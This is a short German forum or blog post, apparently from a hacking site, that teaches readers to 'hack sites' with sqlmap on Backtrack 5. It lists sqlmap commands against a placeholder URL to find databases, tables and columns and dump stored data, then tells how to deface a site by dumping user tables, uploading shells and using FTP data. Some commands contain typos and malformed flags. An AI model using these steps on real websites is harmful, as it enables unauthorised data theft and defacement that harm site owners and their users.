Hallo Community,
da die meisten isch nicht mit Backtrack auskennen,wollte ich euch hiermit eine Möglichkeit beibringen,womit ihr Sites hacken könnt!
Ihr benötigt:
- Backtrack ~ in VM
- Vulnerablity Page
Da ich Backtrack 5 habe,erkläre ich es von der Sicht.Aber ich bin mir sicher,dass das bei „4“ etc. auch so ist.
Als erstes geht mit der Maus auf den StartButton von Backtrack ..
Dort
So nun sollte sich ein „Terminal“ ,sowas wie ein CMD Panel öffnen.
Nun müsst ihr „python sqlmap.py -u http://www.die-beliebige-Seite.de/path/id=9 –dbs“ schreiben.
Und wenn die Seite vulnerable ist,wird die gechecked und die Database Names aufgelistet.
So,aber wir wollen noch die Tables bekommen und später auch die Daten,die gespreichert sind dumpen.
Dafür müssen wir „python slqmap.py http://www.die-beliebige-Seite.de/path/id=9 -D Databasename –tables“ schreiben und es werden alle Tables aufgelistet.
Wenn wir jetzt weiterhin tiefer graben wollen müssen wir :
„python sqlmap.py -u http://www.die-beliebige-Seite.de/path/id=9 -D Databasename -C –columns“ machen.Jetzt wird uns gefragt,ob wir es dumpen wollen oder es einfahc fortfahren soll.
Wir antworten mit „Ja“,dafür schreibt ihr Y rein.
Denn Y,heißt so viel wie „Yes“ und „C“ Continute ..“N“ No.
Wir sind fertig!
Hinweis: Für alle die gerne auch die Seite defacen wollen :
Um eine Seite zu defacen müsst ihr erstma die User Tables dumpen,wie das geht wurde schon oben beschrieben.Wenn ihr euch eingeloggt habt,müsst ihr Shells uppen und mithilfe „FTP Daten“ könnt ihr es dann defacen.
*By Some0ne*
LG
![[Backtrack] SQLMap](https://blog.yakuza112.org/wp-content/uploads/avatar-90x60.png){kind=avatar}
